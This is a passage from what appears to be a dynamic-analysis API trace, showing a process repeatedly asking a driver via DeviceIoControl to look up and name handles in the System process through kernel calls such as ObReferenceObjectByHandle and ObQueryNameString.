ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.655] PsAcquireProcessExitSynchronization () returned 0x0 [0239.655] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.655] ObReferenceObjectByHandle (in: Handle=0xffffffff80000064, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80029f3850, HandleInformation=0x0) returned 0x0 [0239.655] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.655] PsReleaseProcessExitSynchronization () returned 0x2 [0239.655] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.655] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.655] ObfDereferenceObject (Object=0xfffffa80029f3850) returned 0x1 [0239.655] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.656] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.656] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.656] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.656] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.656] PsAcquireProcessExitSynchronization () returned 0x0 [0239.656] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.656] ObReferenceObjectByHandle (in: Handle=0xffffffff80000068, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8004bdf050, HandleInformation=0x0) returned 0x0 [0239.656] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.656] PsReleaseProcessExitSynchronization () returned 0x2 [0239.656] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.656] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003084044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003084044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.656] ObfDereferenceObject (Object=0xfffffa8004bdf050) returned 0x1 [0239.656] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.656] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.656] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.656] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.656] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.656] PsAcquireProcessExitSynchronization () returned 0x0 [0239.656] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.656] ObReferenceObjectByHandle (in: Handle=0xffffffff8000006c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003e71050, HandleInformation=0x0) returned 0x0 [0239.656] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.656] PsReleaseProcessExitSynchronization () returned 0x2 [0239.656] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.656] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.657] ObfDereferenceObject (Object=0xfffffa8003e71050) returned 0x1 [0239.657] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.657] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.657] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.657] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.657] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.657] PsAcquireProcessExitSynchronization () returned 0x0 [0239.657] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.657] ObReferenceObjectByHandle (in: Handle=0xffffffff80000070, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80045a7c90, HandleInformation=0x0) returned 0x0 [0239.657] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.657] PsReleaseProcessExitSynchronization () returned 0x2 [0239.657] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.657] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.657] ObfDereferenceObject (Object=0xfffffa80045a7c90) returned 0x1 [0239.657] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.657] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.657] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.657] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.657] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.657] PsAcquireProcessExitSynchronization () returned 0x0 [0239.657] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.658] ObReferenceObjectByHandle (in: Handle=0xffffffff80000074, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003d963e0, HandleInformation=0x0) returned 0x0 [0239.658] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.658] PsReleaseProcessExitSynchronization () returned 0x2 [0239.658] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.658] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.658] ObfDereferenceObject (Object=0xfffffa8003d963e0) returned 0x1 [0239.658] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.658] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.658] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.658] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.658] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.658] PsAcquireProcessExitSynchronization () returned 0x0 [0239.658] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.658] ObReferenceObjectByHandle (in: Handle=0xffffffff80000078, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80045a7f20, HandleInformation=0x0) returned 0x0 [0239.658] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.658] PsReleaseProcessExitSynchronization () returned 0x2 [0239.658] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.658] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.658] ObfDereferenceObject (Object=0xfffffa80045a7f20) returned 0x1 [0239.658] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.659] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.659] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.659] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.659] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.659] PsAcquireProcessExitSynchronization () returned 0x0 [0239.659] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.659] ObReferenceObjectByHandle (in: Handle=0xffffffff8000007c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80029f2d30, HandleInformation=0x0) returned 0x0 [0239.659] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.659] PsReleaseProcessExitSynchronization () returned 0x2 [0239.659] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.659] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.659] ObfDereferenceObject (Object=0xfffffa80029f2d30) returned 0x1 [0239.659] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.659] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.659] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.659] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.659] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.659] PsAcquireProcessExitSynchronization () returned 0x0 [0239.659] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.659] ObReferenceObjectByHandle (in: Handle=0xffffffff80000080, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800343b050, HandleInformation=0x0) returned 0x0 [0239.659] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.659] PsReleaseProcessExitSynchronization () returned 0x2 [0239.660] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.660] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.660] ObfDereferenceObject (Object=0xfffffa800343b050) returned 0x1 [0239.660] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.660] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.660] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0239.660] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.660] PsAcquireProcessExitSynchronization () returned 0x0 [0239.660] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0239.660] ObReferenceObjectByHandle (in: Handle=0xffffffff80000084, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002ad5ca0, HandleInformation=0x0) returned 0x0 [0239.660] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.660] PsReleaseProcessExitSynchronization () returned 0x2 [0239.660] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0239.660] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8508) returned 0x0 [0239.660] ObfDereferenceObject (Object=0xfffffa8002ad5ca0) returned 0x1 [0239.660] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.660] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.660] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.156] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0240.157] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.157] PsAcquireProcessExitSynchronization () returned 0x0 [0240.157] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.157] ObReferenceObjectByHandle (in: Handle=0xffffffff80000088, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028dfb50, HandleInformation=0x0) returned 0x0 [0240.157] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.157] PsReleaseProcessExitSynchronization () returned 0x2 [0240.157] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.157] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8508) returned 0x0 [0240.157] ObfDereferenceObject (Object=0xfffffa80028dfb50) returned 0x1 [0240.157] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.157] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.157] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.157] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.158] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.158] PsAcquireProcessExitSynchronization () returned 0x0 [0240.158] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.158] ObReferenceObjectByHandle (in: Handle=0xffffffff8000009c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80029f0270, HandleInformation=0x0) returned 0x0 [0240.158] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.158] PsReleaseProcessExitSynchronization () returned 0x2 [0240.158] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.158] ObQueryNameString (in: Object=0xfffffa80029f0270, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.158] ObfDereferenceObject (Object=0xfffffa80029f0270) returned 0x2 [0240.158] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.159] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.159] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.159] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.159] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.159] PsAcquireProcessExitSynchronization () returned 0x0 [0240.159] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.159] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80029f0600, HandleInformation=0x0) returned 0x0 [0240.159] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.159] PsReleaseProcessExitSynchronization () returned 0x2 [0240.159] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.159] ObQueryNameString (in: Object=0xfffffa80029f0600, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.160] ObfDereferenceObject (Object=0xfffffa80029f0600) returned 0x2 [0240.160] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.160] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.160] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.160] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.160] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.160] PsAcquireProcessExitSynchronization () returned 0x0 [0240.160] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.160] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80029f0cd0, HandleInformation=0x0) returned 0x0 [0240.160] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.160] PsReleaseProcessExitSynchronization () returned 0x2 [0240.161] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.161] ObQueryNameString (in: Object=0xfffffa80029f0cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.161] ObfDereferenceObject (Object=0xfffffa80029f0cd0) returned 0x1 [0240.161] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.161] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.161] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.161] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0240.161] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.161] PsAcquireProcessExitSynchronization () returned 0x0 [0240.161] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.161] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80028de340, HandleInformation=0x0) returned 0x0 [0240.161] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.162] PsReleaseProcessExitSynchronization () returned 0x2 [0240.162] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.162] ObQueryNameString (in: Object=0xfffffa80028de340, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.162] ObfDereferenceObject (Object=0xfffffa80028de340) returned 0x2 [0240.162] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.162] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.162] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.162] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0240.162] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.162] PsAcquireProcessExitSynchronization () returned 0x0 [0240.162] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.162] ObReferenceObjectByHandle (in: Handle=0xffffffff800000ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80029eebd0, HandleInformation=0x0) returned 0x0 [0240.162] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.163] PsReleaseProcessExitSynchronization () returned 0x2 [0240.163] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0240.163] ObQueryNameString (in: Object=0xfffffa80029eebd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.163] ObfDereferenceObject (Object=0xfffffa80029eebd0) returned 0x2 [0240.163] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.163] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.163] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.163] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0240.163] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.163] PsAcquireProcessExitSynchronization () returned 0x0 [0240.163] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, 